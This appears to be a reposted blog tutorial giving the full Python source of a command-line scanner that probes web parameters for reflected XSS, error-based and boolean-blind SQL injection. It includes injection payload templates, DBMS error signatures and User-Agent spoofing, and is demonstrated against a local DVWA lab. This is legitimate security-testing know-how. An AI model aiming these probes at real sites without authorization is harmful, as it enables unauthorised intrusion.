Implementing a Web Vulnerability Scanning Tool as a Python Script

Source: Internet
Author: User
Tags: HTTP, cookie, simple SQL injection, Access database
This is a small web vulnerability scanning tool I wrote last year, aimed mainly at simple SQL injection, blind SQL injection, and XSS vulnerabilities. I wrote the code myself, following the ideas in the source of two small tools by a well-known GitHub author (said to be one of the authors of sqlmap). The usage instructions and source code follow.

First, instructions for use:

1. Operating Environment:

A Linux command-line environment with Python 2.7

2. Program Source code:

vim scanner        # create a file named scanner

chmod a+x scanner  # make the file executable

3. Run the program:

python scanner     # run the program

If no target URL is supplied, the program prints help information showing which parameters can be entered.

Parameters include:

-h, --help output help information
--url the URL to scan
--data parameters of the POST request method
--cookie HTTP request header Cookie value
--user-agent HTTP request header User-Agent value
--random-agent use a randomly chosen browser User-Agent (browser camouflage)
--referer HTTP request header Referer value (the page that links to the target URL)
--proxy HTTP proxy address
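The options above map directly onto Python's optparse module. Here is a minimal sketch of how such an option set is declared and parsed; the option names follow the list above, and the sample command-line arguments are purely illustrative (optparse adds -h/--help automatically):

```python
import optparse

# Declare the scanner's command-line options (names taken from the list above).
parser = optparse.OptionParser()
parser.add_option("--url", dest="url", help="Target URL")
parser.add_option("--data", dest="data", help="POST data")
parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
parser.add_option("--random-agent", dest="randomAgent", action="store_true",
                  help="use a randomly selected HTTP User-Agent header value")
parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
parser.add_option("--proxy", dest="proxy", help="HTTP proxy address")

# Parse a hypothetical command line instead of sys.argv, for demonstration.
options, _ = parser.parse_args(["--url=http://127.0.0.1/?id=1", "--random-agent"])
print(options.url)          # the target URL as given
print(options.randomAgent)  # True, because --random-agent was passed
```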

For example, to scan "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit":

python scanner --url="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=menntb9b2isj7qha739ihg9of1"

The output scan results are as follows:

The results show:

There is an XSS vulnerability: the reflected payload matches the signature ">.xss.<" in the pattern library, i.e. the type that appears outside of embedded tags.
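The "outside of tags" match can be illustrated with a small sketch. The marker and HTML response below are hypothetical, but the regular expression mirrors the style of the signature reported above: a reflected marker surrounded by non-tag text indicates unescaped output.

```python
import re

# Hypothetical injected marker: random prefix + tampering chars + random suffix.
marker = "abcde'\";qwxyz"
# Hypothetical response page that reflects the marker unescaped, outside any tag.
html = "<html><body>Results for %s not found</body></html>" % marker

# Signature analogous to the scanner's "outside of tags" XSS pattern:
# a '>' closing a tag, then text containing the marker, then '<' or end of input.
pattern = r">[^<]*%(chars)s[^<]*(<|\Z)" % {"chars": re.escape(marker)}
print(bool(re.search(pattern, html)))  # True -> marker reflected outside of tags
```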

There is a SQL injection vulnerability, and the target web server's database is MySQL.
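Error-based detection simply searches the response body for known DBMS error strings. A minimal sketch, using a hypothetical MySQL error page and a subset of the MySQL signatures from the source below:

```python
import re

# Subset of the scanner's MySQL error signatures.
MYSQL_ERRORS = (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result")

# Hypothetical response body after injecting a stray quote into the parameter.
body = ("You have an error in your SQL syntax; check the manual that "
        "corresponds to your MySQL server version")

# Any signature match identifies the backend DBMS as MySQL.
print(any(re.search(rx, body, re.I) for rx in MYSQL_ERRORS))  # True
```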

There is a blind SQL injection vulnerability.
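Blind detection works by injecting a TRUE condition (e.g. AND 1=1) and a FALSE one (e.g. AND 1=2), then comparing both responses against the original page with difflib, using the same 0.95 similarity thresholds as the scanner. A minimal sketch with hypothetical page bodies:

```python
import difflib

# Hypothetical page bodies: the TRUE condition leaves the page unchanged,
# the FALSE condition produces a clearly different page.
original = "Welcome back, admin. Your last login was yesterday."
page_true = "Welcome back, admin. Your last login was yesterday."
page_false = "No results found."

ratio_true = difflib.SequenceMatcher(None, original, page_true).quick_ratio()
ratio_false = difflib.SequenceMatcher(None, original, page_false).quick_ratio()

# Same thresholds as the scanner: > 0.95 for TRUE, < 0.95 for FALSE.
print(ratio_true > 0.95 and ratio_false < 0.95)  # True -> likely blind SQLi
```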

Second, the source code:

The code has been verified to run; I personally recommend testing it against DVWA.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import optparse, random, re, string, urllib, urllib2, difflib, itertools, httplib

NAME = "Scanner for RXSS and SQLi"
AUTHOR = "lishuze"

PREFIXES = (" ", ") ", "' ", "') ", "\" ")
SUFFIXES = ("", "-- -", "#")
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d=%d)")
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"')
TAMPER_XSS_CHAR_POOL = ('\'', '"', '>', '<', ';')

GET, POST = "GET", "POST"
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"
TEXT, HTTPCODE, TITLE, HTML = xrange(4)

_headers = {}

USER_AGENTS = (
    "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21",
)

# (regex template, description, regex of content to strip before matching)
XSS_PATTERNS = (
    (r"<!--[^>]*%(chars)s|%(chars)s[^<]*-->", "\"<!--.'.xss.'.-->\", inside the comment", None),
    (r"(?s)<script[^>]*>[^<]*?'[^<']*%(chars)s|%(chars)s[^<']*'[^<]*</script>", "\"<script>.'.xss.'.</script>\", enclosed by <script> tags, inside single-quotes", None),
    (r'(?s)<script[^>]*>[^<]*?"[^<"]*%(chars)s|%(chars)s[^<"]*"[^<]*</script>', "'<script>.\".xss.\".</script>', enclosed by <script> tags, inside double-quotes", None),
    (r"(?s)<script[^>]*>[^<]*?%(chars)s|%(chars)s[^<]*</script>", "\"<script>.xss.</script>\", enclosed by <script> tags", None),
    (r">[^<]*%(chars)s[^<]*(<|\Z)", "\">.xss.<\", outside of tags", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r"<[^>]*'[^>']*%(chars)s[^>']*'[^>]*>", "\"<.'.xss.'.>\", inside the tag, inside single-quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r'<[^>]*"[^>"]*%(chars)s[^>"]*"[^>]*>', "'<.\".xss.\".>', inside the tag, inside double-quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r"<[^>]*%(chars)s[^>]*>", "\"<.xss.>\", inside the tag, outside of quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
)

DBMS_ERRORS = {
    "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
    "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
    "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
    "Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
}

def _retrieve_content_xss(url, data=None):
    # Encode spaces in the query string, then fetch the page.
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += surl.join(url[i]).replace(' ', "%20")
        else:
            surl += surl.join(url[i])
    try:
        req = urllib2.Request(surl, data, _headers)
        retval = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval = getattr(ex, "message", "")
    return retval or ""

def _retrieve_content_sql(url, data=None):
    # Fetch the page and extract HTTP code, title, raw HTML and visible text.
    retval = {HTTPCODE: httplib.OK}
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += surl.join(url[i]).replace(' ', "%20")
        else:
            surl += surl.join(url[i])
    try:
        req = urllib2.Request(surl, data, _headers)
        retval[HTML] = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval[HTTPCODE] = getattr(ex, "code", None)
        retval[HTML] = getattr(ex, "message", "")
    match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
    retval[TITLE] = match.group("result") if match else None
    retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
    return retval

def scan_page_xss(url, data=None):
    print "Start scanning RXSS:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", r"=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", r"=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w]+)=)(?P<value>[^&]+)", current):
                found, usable = False, True
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                prefix = "".join(random.sample(string.ascii_lowercase, 5))
                suffix = "".join(random.sample(string.ascii_lowercase, 5))
                if not found:
                    # Inject prefix + tampering characters + suffix into the parameter.
                    tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("%s%s%s%s" % ("'", prefix, "".join(random.sample(TAMPER_XSS_CHAR_POOL, len(TAMPER_XSS_CHAR_POOL))), suffix))))
                    content = _retrieve_content_xss(tampered, data) if phase is GET else _retrieve_content_xss(url, tampered)
                    for sample in re.finditer("%s([^ ]+?)%s" % (prefix, suffix), content, re.I):
                        #print sample.group()
                        for regex, info, content_removal_regex in XSS_PATTERNS:
                            context = re.search(regex % {"chars": re.escape(sample.group(0))}, re.sub(content_removal_regex or "", "", content), re.I)
                            if context and not found and sample.group(1).strip():
                                print "!!! %s parameter '%s' appears to be XSS vulnerable (%s)" % (phase, match.group("parameter"), info)
                                found = retval = True
        if not usable:
            print "(x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r(x) Ctrl-C pressed"
    return retval

def scan_page_sql(url, data=None):
    print "Start scanning SQLi:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", r"=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", r"=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
                vulnerable, usable = False, True
                original = None
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                # Error-based check: inject stray SQL characters and grep for DBMS errors.
                tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL))))))
                content = _retrieve_content_sql(tampered, data) if phase is GET else _retrieve_content_sql(url, tampered)
                for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
                    if not vulnerable and re.search(regex, content[HTML], re.I):
                        print "!!! %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms)
                        retval = vulnerable = True
                # Boolean-based blind check: compare TRUE/FALSE payload responses.
                vulnerable = False
                original = original or (_retrieve_content_sql(current, data) if phase is GET else _retrieve_content_sql(url, current))
                for prefix, boolean, suffix in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES):
                    if not vulnerable:
                        template = "%s%s%s" % (prefix, boolean, suffix)
                        payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (1 if _ else 2, 1), safe='%')))) for _ in (True, False))
                        contents = dict((_, _retrieve_content_sql(payloads[_], data) if phase is GET else _retrieve_content_sql(url, payloads[_])) for _ in (True, False))
                        if all(_[HTTPCODE] for _ in (original, contents[True], contents[False])) and any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE)):
                            vulnerable = True
                        else:
                            ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (True, False))
                            vulnerable = all(ratios.values()) and ratios[True] > 0.95 and ratios[False] < 0.95
                        if vulnerable:
                            print "!!! %s parameter '%s' could be blind SQLi vulnerable" % (phase, match.group("parameter"))
                            retval = True
        if not usable:
            print "(x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r(x) Ctrl-C pressed"
    return retval

def init_options(proxy=None, cookie=None, ua=None, referer=None):
    global _headers
    _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
    urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

if __name__ == "__main__":
    print "----------------------------------------------------------------------------------"
    print "%s\nBy: %s" % (NAME, AUTHOR)
    print "----------------------------------------------------------------------------------"
    parser = optparse.OptionParser()
    parser.add_option("--url", dest="url", help="Target URL")
    parser.add_option("--data", dest="data", help="POST data")
    parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
    parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
    parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="use randomly selected HTTP User-Agent header value")
    parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
    parser.add_option("--proxy", dest="proxy", help="HTTP proxy address")
    options, _ = parser.parse_args()
    if options.url:
        init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer)
        result_xss = scan_page_xss(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_xss else "no")
        print "----------------------------------------------------------------------------------"
        result_sql = scan_page_sql(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_sql else "no")
        print "----------------------------------------------------------------------------------"
    else:
        parser.print_help()

The above introduces a web vulnerability scanning tool implemented as a Python script. I hope it helps; if you have any questions, leave me a message and I will reply as soon as possible. Thank you very much for your support of topic.alibabacloud.com!
